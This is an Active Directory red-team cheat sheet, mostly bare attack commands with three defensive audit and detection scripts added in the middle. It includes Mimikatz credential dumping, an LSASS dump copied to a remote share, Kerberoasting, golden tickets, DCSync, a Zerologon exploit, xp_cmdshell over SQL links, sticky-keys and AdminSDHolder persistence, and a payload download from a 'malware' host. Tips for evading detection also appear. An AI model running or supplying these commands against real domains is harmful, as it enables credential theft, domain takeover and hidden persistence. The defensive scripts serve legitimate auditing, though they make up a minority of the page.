A set of instructions, commands and techniques that help during an Active Directory assessment.
This document is intended for use in a red team assessment and contains the commands, tools and methods with which anyone can attack and defend Active Directory.
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()
Get-ADDomain
Get-ADDomain -Identity security.local
(Get-ADDomain).DomainSID
masscan --rate 100000 -e eth0 --ports <port range> --open-only <SCAN RANGE>
Common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389, etc
Reference: https://github.com/robertdavidgraham/masscan
Nmap all "user$.domain_name" for open ports/services
Tuned Nmap
nmap -Pn -n -A -T4 --top-ports=1000 --max-rtt-timeout=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=200ms --open --stats-every 5s <IP/Range>
Get-DomainPolicy
(Get-DomainPolicy)."System Access"
(Get-DomainPolicy)."Kerberos Policy"
Get-ADDomainController
Get-NetDomainTrust
Get-NetDomainTrust -Domain security.local
Get-NetForestTrust
Get-ADForest
Get-ADForest -Identity security.local
(Get-ADForest).Domains
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity domainAdmin -Properties *
Get-ADUser -Server DC.security.local
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberName *Properties | select name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
Get-ADUser -Filter '<filter>' -Properties Description | select name,Description | Export-CSV "Description.csv"
Get-EventLog -LogName Security |
    Where-Object { $_.EventID -eq 4662 -and $_.Message -match "domainAdmin" } |
    Select-Object -Property Category,Index,TimeGenerated,EntryType,Source,InstanceID,Message |
    Format-Table -AutoSize
Get-ADComputer -Filter * -Properties *
Get-ADComputer -Filter * | select name
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADGroup -Filter * | select name
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
Get-ADGroupMember -Identity 'Administrators' -Recursive -Server <> | % {Get-ADUser $_ -prop ServicePrincipalName} | Where {$_.ServicePrincipalName}
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity domainAdmin
Get-NetGroupMember -GroupName '*Admin' -Domain security.local | Select-Object MemberName
$Groups = Get-ADGroup -Filter * -SearchBase "OU=confidential,DC=security,DC=local"
$Members = foreach ($Group in $Groups)
{
Get-ADGroupMember -Identity $Group |
Where-Object objectClass -eq 'Group' |
Select-Object Name,SamAccountName
}
Write-Output $Members
Get-GPO -All
Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html
Get-NetGPO | select displayname
Get-NetGPO -ComputerName <>
Get-NetGPOGroup
gpresult /R /V
Find-GPOComputerAdmin -Computername <>
Find-GPOLocation -UserName domainAdmin -Verbose
Get-NetOU -FullData
Get-NetOU -GPOname "{GUID}"
Get-ADOrganizationalUnit -Filter * -Properties *
Get-GPO -Guid {GUID}
Get-NetLoggedon -ComputerName
Get-LoggedonLocal -ComputerName
Get-LastLoggedOn -ComputerName
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Invoke-FileFinder -Verbose
Get-NetFileServer
Find-LocalAdminAccess -Verbose
Find-WMILocalAdminAccess.ps1
Invoke-EnumerateLocalAdmin -Verbose
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -CheckAccess
Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=security,DC=local').Access
Get-ObjectAcl -ADSpath "LDAP://" -ResolveGUIDs -Verbose
Invoke-ACLScanner -ResolveGUIDs
Get-PathAcl -Path "\\security.local\sysvol"
Get-SQLInstanceDomain
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink
start powershell -credential ""
Enter-PSSession -ComputerName COMPUTER -Credential USER
Invoke-Command -ComputerName <> -ScriptBlock ${function:hello}
ls function:
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName <>
Invoke-Mimikatz -DumpCreds -ComputerName
Exit-PSSession
.\PsExec.exe \\Computer -u domain\user -s powershell Enable-PSRemoting -Force
Invoke-WmiMethod -ComputerName <> -Namespace root\cimv2 -Class Win32_Process -Name Create -Credential "domain\user" -Impersonation 3 -EnableAllPrivileges -ArgumentList "powershell Start-Process powershell -Verb runAs -ArgumentList 'Enable-PSRemoting -Force'"
Invoke-WmiMethod -ComputerName localmachine.security.local -Namespace root\cimv2 -Class Win32_Process -Name Create -Credential "security.local\domainAdmin" -Impersonation 3 -EnableAllPrivileges -ArgumentList "powershell Start-Process powershell -Verb runAs -ArgumentList 'Enable-PSRemoting -Force'"
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose
Get-WmiObject -Class win32_service |
    Where-Object { $_.pathname -and $_.pathname.Trim() -ne '' } |
    Where-Object { -not $_.pathname.StartsWith('"') -and -not $_.pathname.StartsWith("'") } |
    Where-Object { $_.pathname.ToLower().IndexOf(".exe") -ge 0 } |
    Where-Object { $_.pathname.Substring(0, $_.pathname.ToLower().IndexOf(".exe") + 4) -match ".* .*" }
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "cmd" /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
Rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\crash_dump.bin full
Copy-Item -Path C:\temp\crash_dump.bin -Destination '\\192.168.1.2\c$'
$url = "https://myhost.malware/file.exe"
$output = "./file.exe"
Invoke-WebRequest -Uri $url -OutFile $output
query session
logoff ID
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name "UseLogonCredential" -Value 1 -PropertyType "DWord"
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
Get-ADUser -Filter "useraccountcontrol -band 32" -Properties PasswordLastSet | Where-Object { $_.PasswordLastSet -eq $null } | select SamAccountName,Name,distinguishedname | Out-GridView
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
Invoke-Mimikatz -Command '"kerberos::list /export"'
python tgsrepcrack.py wordlist.txt .kirbi
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose
Get-ASREPHash -UserName -Verbose
Invoke-ASREPRoast -Verbose
Get-NetComputer -UnConstrained
Get-NetUser -UnConstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
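The Kerberoast, AS-REP roast, unconstrained and constrained delegation checks above each enumerate one exposure at a time. The script below is an added defensive audit, not part of the original cheat sheet: it collects the same exposures into a single report and adds the risk notes a reviewer usually has to work out by hand (RC4-only encryption types, stale service-account passwords, SPNs on protected accounts, unconstrained delegation on non-DCs). It requires the ActiveDirectory RSAT module; the `DC.security.local` server name is an assumed placeholder taken from the page's examples.

```powershell
# Added audit script (not from the original cheat sheet). Requires the ActiveDirectory module.
Import-Module ActiveDirectory

function Get-KerberosExposureReport {
    param([string]$Server = 'DC.security.local')   # assumed DC name, adjust to your domain

    $props = 'ServicePrincipalName','DoesNotRequirePreAuth','TrustedForDelegation',
             'msDS-AllowedToDelegateTo','msDS-SupportedEncryptionTypes','PasswordLastSet','AdminCount'

    # Enabled users: Kerberoastable (SPN set), AS-REP roastable (no pre-auth), delegation flags
    $users = Get-ADUser -Server $Server -Filter 'Enabled -eq $true' -Properties $props

    # Computers that carry any delegation setting; unconstrained delegation off a DC is the classic finding
    $computers = Get-ADComputer -Server $Server `
        -Filter 'TrustedForDelegation -eq $true -or msDS-AllowedToDelegateTo -like "*"' -Properties $props

    # Domain controllers are expected to have unconstrained delegation, so they are excluded from that note
    $dcs = (Get-ADDomainController -Server $Server -Filter *).Name

    $findings = foreach ($o in @($users) + @($computers)) {
        $notes = @()

        if ($o.ObjectClass -eq 'user' -and $o.ServicePrincipalName.Count -gt 0) {
            $notes += 'SPN on user account (Kerberoastable)'
            # 0x08 = AES128, 0x10 = AES256; without either bit the service ticket is RC4 and cheapest to crack offline
            $enc = $o.'msDS-SupportedEncryptionTypes'
            if (-not $enc -or ($enc -band 0x18) -eq 0) { $notes += 'no AES encryption types, RC4 tickets' }
            if ($o.PasswordLastSet -lt (Get-Date).AddYears(-1)) { $notes += 'password older than one year' }
            if ($o.AdminCount -eq 1) { $notes += 'protected/admin account with SPN' }
        }
        if ($o.DoesNotRequirePreAuth) { $notes += 'Kerberos pre-auth disabled (AS-REP roastable)' }
        if ($o.TrustedForDelegation -and $dcs -notcontains $o.Name) { $notes += 'unconstrained delegation' }
        if ($o.'msDS-AllowedToDelegateTo') {
            $notes += "constrained delegation to: $($o.'msDS-AllowedToDelegateTo' -join ', ')"
        }

        if ($notes) {
            [pscustomobject]@{ Object = $o.SamAccountName; Class = $o.ObjectClass; Findings = ($notes -join '; ') }
        }
    }
    return $findings
}

Get-KerberosExposureReport | Sort-Object Class, Object | Format-Table -AutoSize -Wrap
```

Each row is one account with every applicable note, so an SPN account that is also a member of a protected group and still on RC4 shows up once with all three reasons, which is the order of priority for remediation (gMSA or long random password, AES-only encryption types, remove from privileged groups).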
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
lsadump::trust /patch
kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
.\asktgs.exe c:\temp\ticket.kirbi CIFS/DC.parent.local
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
dir \\machine.domain.local\c$
privilege::debug
!+
token::elevate
!processprotect /remove /process:LSASS.EXE
misc::memssp
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords full"'
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::wdigest"'
privilege::debug
sekurlsa::minidump crash_dump.bin
sekurlsa::logonPasswords
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::pth /user:Administrateur /domain:security.local /ntlm:xxxxxxxxxxxxx"'
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::ekeys"'
dir \\192.168.1.2\c$\Users\<username>\AppData\Local\Microsoft\Credentials\*
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\164451c5ed8ad780d136e400bd0c50c8
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::dpapi"'
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\164451c5ed8ad780d136e400bd0c50c8 /masterkey:e605b19f96917ed2a29c816eb2f2cfdb85c9ba67379e62721b77b3ee0e23ec6e253ba6202a1595dc63083212d8933a11bc93fc85c5bac7f04406d5d5af2e57a3
vault::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Vault\
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::kerberos"'
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
mimikatz "lsadump::dcsync /domain:security.local /user:netbios\krbtgt"
.\mimikatz.exe kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
lsadump::zerologon /server:DC.security.local /account:DC$
lsadump::zerologon /server:DC.security.local /account:DC$ /exploit
lsadump::dcsync /domain:security.local /dc:DC /user:krbtgt /authuser:DC$ /authdomain:security /authpassword:"" /authntlm
Rubeus.exe monitor /interval:1 > tickets.txt
SpoolSample.exe target client
select * from openquery("dcorp-sql1",'select * from master..sysservers')
Get-SQLServerLinkCrawl -Instance <> -Verbose
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql"
Get-SQLServerLinkCrawl -Instance <> -Query "exec master..xp_cmdshell 'whoami'"
Set-ADACL -DistinguishedName 'DC=SRV,DC=security,DC=local' -Principal domainAdmin -GUIDRight DCSync -Verbose
mimikatz "lsadump::dcsync /domain:security.local /user:netbios\krbtgt"
kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
kerberos::golden /user:Administrator /domain:security.local /sid:S-1-5-21-123456789-1234567890-1111112345 /aes128:xxxxx /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=SRV,DC=security,DC=local' -Principal domainAdmin -Verbose
Add-ADGroupMember -Identity 'Domain Admins' -Members testda -Verbose
Add-ObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=security,DC=local' -PrincipalIdentity hacker -Verbose -Rights All
Get-ObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=security,DC=local' -Verbose
powershell.exe iex (iwr 'https://raw.githubusercontent.com/edemilliere/ADSI/master/Invoke-ADSDPropagation.ps1')
Invoke-ADSDPropagation
privilege::debug
token::elevate
sid::patch
sid::add /sam:"hacker" /new:S-1-5-21-123456789-1234567890-1111112345-519
privilege::debug
lsadump::sam
Domain : SECURITY
SysKey : 48e9dfa91da8e1b32a38b9e45323e430
Local SID : S-1-5-21-123456789-1234567890-1111112345
SAMKey : 2c9d7841c1ab3a64b7e0f8d5ee3ad828
RID : 000001f4 (500)
User : Administrator
Hash NTLM: af5adaaf26ccc3fab908fcb5435b49d8
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
REG ADD HKLM\System\CurrentControlSet\Control\Lsa\ /v DsrmAdminLogonBehavior /t REG_DWORD /d 1 /f
Limit DA logins; if a DA login is necessary, do not allow other administrators to log in to that machine.
Never run a service with DA privileges.
Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose
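The registry values used in the persistence and credential-theft commands above (WDigest `UseLogonCredential`, `DisableRestrictedAdmin`, `DsrmAdminLogonBehavior`, the `sethc.exe` IFEO debugger) and the `RunAsPPL` hardening value are all things a defender should be checking, not just setting. The script below is an added audit, not part of the original cheat sheet: it reads each value on the local host and reports deviations from the hardened baseline assumed in the `$Checks` table (absent values are treated as the Windows default). Run it from an elevated PowerShell on the host being reviewed.

```powershell
# Added audit script (not from the original cheat sheet). The expected values below are the
# assumed hardened baseline; adjust them to your own policy.
$Checks = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
       Name = 'UseLogonCredential'; Bad = @(1)
       Note = '1 keeps plaintext logon credentials in LSASS memory' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'RunAsPPL'; Required = 1
       Note = 'LSASS should run as a protected process (RunAsPPL = 1)' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'DsrmAdminLogonBehavior'; Bad = @(1, 2)
       Note = 'non-zero lets the DSRM administrator log on while the DC is online' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'DisableRestrictedAdmin'; Bad = @(0)
       Note = '0 enables Restricted Admin RDP, which accepts an NTLM hash instead of a password' },
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
       Name = 'Debugger'; AnyValueBad = $true
       Note = 'any Debugger value replaces the sticky-keys binary at the logon screen' }
)

function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    # Return $null when the key or the value is missing instead of throwing
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-LsaHardening {
    foreach ($c in $Checks) {
        $actual = Get-RegValueOrNull -Path $c.Path -Name $c.Name
        $finding = $false
        if ($c.ContainsKey('Required')) {
            # Value must be present and equal to the required setting
            $finding = (($actual -as [int]) -ne $c.Required)
        } elseif ($c.AnyValueBad) {
            # Value must not exist at all
            $finding = ($null -ne $actual)
        } else {
            # Value may be absent (default) but must not be one of the known-bad settings
            $finding = ($null -ne $actual) -and ($c.Bad -contains [int]$actual)
        }
        [pscustomobject]@{
            Setting = $c.Name
            Actual  = if ($null -eq $actual) { '<absent>' } else { $actual }
            Status  = if ($finding) { 'FINDING' } else { 'OK' }
            Note    = $c.Note
        }
    }
}

Test-LsaHardening | Format-Table -AutoSize -Wrap
```

Running this periodically (or shipping the output to a SIEM) turns the one-off `REG ADD` commands on this page into a detectable configuration drift: a host where `UseLogonCredential` flips to 1 or a `sethc.exe` debugger appears is worth an incident ticket, not just a remediation.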
4662 - An operation was performed on an object
5136 - A directory service object was modified
4670 - Permissions on object were changed
4780 - The ACL was set on accounts which are members of administrators groups
4756 - Account was added to security-enabled universal group
4776 - The domain controller attempted to validate the credentials for an account (NTLM authentication)
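The event IDs listed above are the ones that record the ACL, group and privileged-logon changes this page's persistence techniques produce. The script below is an added detection example, not part of the original cheat sheet: it pulls those events for the last 24 hours from the Security log (locally, or from a DC via `-ComputerName`), counts them per ID so the rare ones stand out, and decodes the 4756 and 4672 events into who-did-what rows. The 24-hour window and the event field names (`SubjectUserName`, `TargetUserName`, `MemberName`) are the standard Security-log XML fields.

```powershell
# Added detection example (not from the original cheat sheet).
$EventIds = 4662, 5136, 4670, 4780, 4756, 4776, 4672

function Get-SecurityEventData {
    # Flatten the EventData XML of one event record into a name->value hashtable
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Record)
    $data = @{}
    $xml = [xml]$Record.ToXml()
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    return $data
}

function Get-ADPersistenceEvents {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # a DC name in practice
        [int]$Hours = 24
    )
    $filter = @{ LogName = 'Security'; Id = $EventIds; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue
}

$Events = Get-ADPersistenceEvents

# 1. Volume per event ID: 4662/4776 are usually noisy, 4756/4780/4670 should be rare
$Events | Group-Object Id | Sort-Object Count -Descending |
    Select-Object @{ n = 'EventId'; e = { $_.Name } }, Count | Format-Table -AutoSize

# 2. 4756: who was added to a security-enabled universal group (e.g. Enterprise Admins) and by whom
$Events | Where-Object Id -eq 4756 | ForEach-Object {
    $d = Get-SecurityEventData -Record $_
    [pscustomobject]@{
        Time   = $_.TimeCreated
        Group  = $d['TargetUserName']
        Member = $d['MemberName']
        By     = $d['SubjectUserName']
    }
} | Format-Table -AutoSize -Wrap

# 3. 4672: accounts that received admin-equivalent privileges at logon; a DA logging on to a
#    workstation (see the "limit DA logins" guidance above) shows up here
$Events | Where-Object Id -eq 4672 | ForEach-Object {
    (Get-SecurityEventData -Record $_)['SubjectUserName']
} | Group-Object | Sort-Object Count -Descending |
    Select-Object @{ n = 'Account'; e = { $_.Name } }, Count | Format-Table -AutoSize
```

The same `Get-SecurityEventData` helper decodes 5136 (`ObjectDN`, `AttributeLDAPDisplayName`, `AttributeValue`) and 4662 (`ObjectName`, `Properties`), which is how an AdminSDHolder ACL change or a DCSync right granted with `Set-ADACL` is spotted: filter 5136 for `nTSecurityDescriptor` on the AdminSDHolder object, or 4662 for the replication property GUIDs on the domain head.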
Builds profile over time
UEBA in 4 weeks for org
Lightweight gateway on DCs
Ignore Get-NetGroupMember and Get-NetComputer
Use AES256 and AES128 to bypass Over Pass The Hash Detection and Golden Ticket Detection
Encrypted PA-DATA PA-ENC-TIMESTAMP
Create Ticket for non-existent user
DCSync is not spoofable until ST is used
DCShadow is not detected, which allows DCSync
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html?m=1
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
If SMB signing is disabled
Spoof
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capture
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
set JOHNPWFILE /tmp/smbhashes.john
Reference
gp3finder -A -t DOMAIN_CONTROLLER -u DOMAINUSER
Locate SYSVOL
\\domain_controller\SYSVOL\DOMAIN_NAME\Policies
Metasploit GPP Module
Decrypt GPP Password
gpresult [/x] [/h] <FILENAME>
Helpful - https://www.gracefulsecurity.com/privilege-escalation-in-windows-domains/
Powershell & C# - https://decoder.cloud/2018/02/02/getting-system/
Mimikatz - https://www.gracefulsecurity.com/privesc-dumping-passwords-in-plaintext-mimikatz/
Incognito - https://www.gracefulsecurity.com/privesc-stealing-windows-access-tokens-incognito/